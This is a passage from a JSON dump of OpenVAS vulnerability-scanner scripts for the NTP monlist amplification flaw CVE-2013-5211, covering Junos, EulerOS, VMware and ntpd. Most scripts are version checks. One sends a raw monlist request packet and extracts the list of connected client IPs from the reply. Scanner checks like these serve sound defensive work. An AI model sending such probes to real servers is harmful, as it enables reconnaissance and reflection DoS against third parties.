Service Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105920\");\n script_version(\"$Revision: 12095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:00:24 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-31 13:20:03 +0200 (Thu, 31 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n\n script_name(\"Junos NTP Server Amplification Denial of Service Vulnerability\");\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"JunOS Local Security Checks\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n 
script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"DoS in NTP server\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"When an NTP client or server is enabled within the [edit system\nntp] hierarchy level of the Junos configuration, REQ_MON_GETLIST and REQ_MON_GETLIST_1 control messages\nsupported by the monlist feature within NTP may allow remote attackers to cause a denial of service. NTP\nis not enabled in Junos by default.\");\n\n script_tag(name:\"impact\", value:\"If NTP is enabled an attacker can exploit the control messages to use\nit as part of a DoS attack against a remote victim or as the target of an attack against the device itself.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 11.4, 12.1, 12.2, 12.3, 13.1, 13.2, 13.3\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10613\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (revcomp(a:version, b:\"11.4R12\") < 0) {\n security_message(port:0, data:version);\n exit(0);\n}\n\nif (version =~ \"^12\") {\n if (revcomp(a:version, b:\"12.1R10\") < 0) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X44-D35\") < 0) &&\n (revcomp(a:version, b:\"12.1X44\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X45-D25\") < 0) &&\n (revcomp(a:version, b:\"12.1X45\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X46-D15\") < 0) &&\n (revcomp(a:version, b:\"12.1X46\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.1X47-D10\") < 0) 
&&\n (revcomp(a:version, b:\"12.1X47\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.2R8\") < 0) &&\n (revcomp(a:version, b:\"12.2\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"12.3R7\") < 0) &&\n (revcomp(a:version, b:\"12.3\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n}\n\nif (version =~ \"^13\") {\n if (revcomp(a:version, b:\"13.1R4-S2\") < 0) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"13.2R4\") < 0) &&\n (revcomp(a:version, b:\"13.2\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n else if ((revcomp(a:version, b:\"13.3R2\") < 0) &&\n (revcomp(a:version, b:\"13.3\") >= 0)) {\n security_message(port:0, data:version);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-24T16:57:39", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-03-24T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2020-03-24T00:00:00", "id": "OPENVAS:1361412562311220201314", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201314", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1314\");\n script_version(\"2020-03-24T07:31:07+0000\");\n script_cve_id(\"CVE-2013-5211\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 07:31:07 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-24 07:31:07 +0000 (Tue, 24 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1314)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1314\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1314\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1314 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 
requests, as exploited in the wild in December 2013.(CVE-2013-5211)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h13.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-09-25T13:24:16", "description": "NTP.org", "cvss3": {}, "published": "2014-01-06T00:00:00", "type": "openvas", "title": "NTP Monlist Feature Enabled", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2019-09-24T00:00:00", "id": "OPENVAS:1361412562310103868", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103868", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP Monlist Feature Enabled\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the 
Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103868\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2013-5211\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-01-06 14:14:08 +0100 (Mon, 06 Jan 2014)\");\n script_name(\"NTP Monlist Feature Enabled\");\n script_category(ACT_ATTACK);\n script_family(\"Denial of Service\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"ntp_open.nasl\");\n script_require_udp_ports(\"Services/udp/ntp\", 123);\n script_mandatory_keys(\"ntp/remote/detected\");\n\n script_xref(name:\"URL\", value:\"http://bugs.ntp.org/show_bug.cgi?id=1532\");\n script_xref(name:\"URL\", value:\"http://lists.ntp.org/pipermail/pool/2011-December/005616.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to cause a denial\n of service.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a NTP monlist request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before\n 4.2.7p26 allows 
remote attackers to cause a denial of service (traffic amplification) via\n forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.\");\n\n script_tag(name:\"solution\", value:\"Update to NTP.org's ntpd 4.2.7p26 or newer or set 'disable monitor' in ntp.conf.\");\n\n script_tag(name:\"summary\", value:\"NTP.org's ntpd is prone to a remote denial-of-service vulnerability because it\n fails to properly handle certain incoming network packets.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd versions before 4.2.7p26. Other implementations might be affected as well.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_port_for_service(default:123, ipproto:\"udp\", proto:\"ntp\");\n\nsoc = open_sock_udp(port);\nif(!soc)\n exit(0);\n\n# http://lists.ntp.org/pipermail/pool/2011-December/005616.html\n# By default, recent 4.2.7 ntpd defaults to ignoring all mode 7 requests,\n# unless \"enable mode7\" is added to ntp.conf. 
In 4.2.7p26, the monlist\n# support code in ntpd was removed due to amplification risk\n\nreq = raw_string(0x17,0x00,0x03,0x2a,0x00,0x00,0x00,0x00,mkpad(40)); # ntpdc -n -c monlist <ip>\n\nsend(socket:soc, data:req);\nbuf = recv(socket:soc, length:1024);\nclose(soc);\n\nif(!buf || strlen(buf) < 8)\n exit(0);\n\nimplementation = ord(buf[2]);\nrequest_code = ord(buf[3]);\nrcount = getword(blob:buf, pos:4);\nrsize = getword(blob:buf, pos:6);\n\nif(rsize == 0 || (implementation != 2 && implementation != 3) || (request_code != 42 || rsize != 72))\n exit(0);\n\nstep = 8;\n\nfor(i = 0; i < rcount; i++) {\n hosts += ord(buf[step+16]) + \".\" + ord(buf[step+17]) + \".\" + ord(buf[step+18]) + \".\" + ord(buf[step+19]) + '\\n';\n step += rsize;\n}\n\nif(hosts)\n report = 'The Scanner was able to retrieve the following list of recent to this ntpd connected hosts:\\n\\n' + hosts + '\\n';\n\nsecurity_message(port:port, proto:\"udp\", data:report);\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:43", "description": "VMware vSphere updates to third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002: VMware vCenter updates to third party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2018-11-19T00:00:00", "id": "OPENVAS:1361412562310103917", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103917", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vcenter_VMSA-2014-0002.nasl 12419 2018-11-19 13:45:13Z cfischer $\n#\n# VMSA-2014-0002: VMware vCenter updates to third party libraries\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms 
of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103917\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12419 $\");\n script_name(\"VMSA-2014-0002: VMware vCenter updates to third party libraries\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-19 14:45:13 +0100 (Mon, 19 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:24:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"a. DDoS vulnerability in NTP third party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of the\n 'monlist' command. 
An attacker may send a forged request to a\n vulnerable NTP server resulting in an amplified response to the\n intended target of the DDoS attack.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\n resolve a security issue.\n\n c. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\n Oracle JRE is updated to version JRE 1.7 Update 45, which addresses\n multiple security issues that existed in earlier releases of Oracle JRE.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware vSphere updates to third party libraries.\");\n\n script_tag(name:\"affected\", value:\"VMware vCenter Server 5.5 prior 5.5 Update 1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\"))exit(0);\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\"))exit(0);\n\nfixed_builds = make_array( \"5.5.0\", \"1623099\" );\n\nif ( ! 
fixed_builds[ vcenter_version] ) exit( 0 );\n\nif ( int( vcenter_build ) < int( fixed_builds[ vcenter_version ] ) ) {\n security_message( port:0, data:esxi_remote_report( ver:vcenter_version, build:vcenter_build, fixed_build:fixed_builds[vcenter_version], typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:42", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2018-11-19T00:00:00", "id": "OPENVAS:1361412562310103916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103916", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2014-0002_remote.nasl 12419 2018-11-19 13:45:13Z cfischer $\n#\n# VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103916\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12419 $\");\n script_name(\"VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-19 14:45:13 +0100 (Mon, 19 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\");\n script_mandatory_keys(\"VMware/ESX/build\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"a. DDoS vulnerability in NTP third party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of the\n 'monlist' command. An attacker may send a forged request to a\n vulnerable NTP server resulting in an amplified response to the\n intended target of the DDoS attack.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\n resolve a security issue.\n\n c. 
vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\n Oracle JRE is updated to version JRE 1.7 Update 45, which addresses\n multiple security issues that existed in earlier releases of Oracle JRE.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware has updated vSphere third party libraries.\");\n\n script_tag(name:\"affected\", value:\"vCenter Server Appliance 5.5 prior to 5.5 Update 1\n\n VMware vCenter Server 5.5 prior 5.5 Update 1\n\n VMware Update Manager 5.5 prior 5.5 Update 1\n\n VMware ESXi 5.5 without patch ESXi550-201403101-SG.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\n\nif( ! esxVersion = get_kb_item( \"VMware/ESX/version\" ) ) exit( 0 );\nif( ! esxBuild = get_kb_item( \"VMware/ESX/build\" ) ) exit( 0 );\n\nfixed_builds = make_array( \"5.5.0\", \"1623387\" );\n\nif( ! fixed_builds[esxVersion] ) exit( 0 );\n\nif( int( esxBuild ) < int( fixed_builds[esxVersion] ) ) {\n security_message(port:0, data:esxi_remote_report( ver:esxVersion, build:esxBuild, fixed_build:fixed_builds[esxVersion] ) );\n exit(0);\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-19T16:07:05", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMware ESXi/ESX updates to third party libraries (VMSA-2014-0002)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2019-12-18T00:00:00", "id": "OPENVAS:1361412562310103915", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103915", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2014-0002: VMware vSphere updates to third party 
libraries\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103915\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi/ESX updates to third party libraries (VMSA-2014-0002)\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more 
patch(es).\");\n\n script_tag(name:\"insight\", value:\"a. DDoS vulnerability in NTP third party libraries\n\n The NTP daemon has a DDoS vulnerability in the handling of the\n 'monlist' command. An attacker may send a forged request to a\n vulnerable NTP server resulting in an amplified response to the\n intended target of the DDoS attack.\n\n b. Update to ESXi glibc package\n\n The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\n resolve a security issue.\n\n c. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\n Oracle JRE is updated to version JRE 1.7 Update 45, which addresses\n multiple security issues that existed in earlier releases of Oracle JRE.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware has updated vSphere third party libraries.\");\n\n script_tag(name:\"affected\", value:\"VMware ESXi 5.5 without patch ESXi550-201403101-SG\n\n VMware ESXi 5.1 without patch ESXi510-201404101-SG\n\n VMware ESXi 5.0 without patch ESXi500-201405101-SG\n\n VMware ESXi 4.1 without patch ESXi410-201404401-SG\n\n VMware ESXi 4.0 without patch ESXi400-201404401-SG\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"5.5.0\", \"VIB:esx-base:5.5.0-1.15.1623387\",\n \"5.1.0\", \"VIB:esx-base:5.1.0-2.27.1743201\",\n \"5.0.0\", \"VIB:esx-base:5.0.0-3.47.1749766\",\n \"4.0.0\", \"ESXi400-201404401-SG\",\n \"4.1.0\", \"ESXi410-201404401-SG\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-26T08:48:41", "description": "VMware vSphere updates to third party libraries", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002 VMware vSphere updates to third party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:103917", "href": "http://plugins.openvas.org/nasl.php?oid=103917", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vcenter_VMSA-2014-0002.nasl 6663 2017-07-11 09:58:05Z teissa $\n#\n# VMware Security Updates for vCenter Server (VMSA-2013-0012)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"VMware vSphere updates to third party libraries\";\n\ntag_solution = \"Apply the missing patch(es).\";\ntag_affected = \"VMware vCenter Server 5.5 prior 5.5 Update 1 \";\ntag_vuldetect = \"Check the build number.\";\ntag_insight = 'a. 
DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of thE\n\"monlist\" command. An attacker may send a forged request to a\nvulnerable NTP server resulting in an amplified response to the\nintended target of the DDoS attack. \n\nb. Update to ESXi glibc package\n\nThe ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\nresolve a security issue.\n\nc. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\nOracle JRE is updated to version JRE 1.7 Update 45, which addresses\nmultiple security issues that existed in earlier releases of Oracle\nJRE.';\n\nif (description)\n{\n script_id(103917);\n script_cve_id(\"CVE-2013-5211\",\"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version (\"$Revision: 6663 $\");\n script_name(\"VMSA-2014-0002 VMware vSphere updates to third party libraries\");\n\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:24:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", 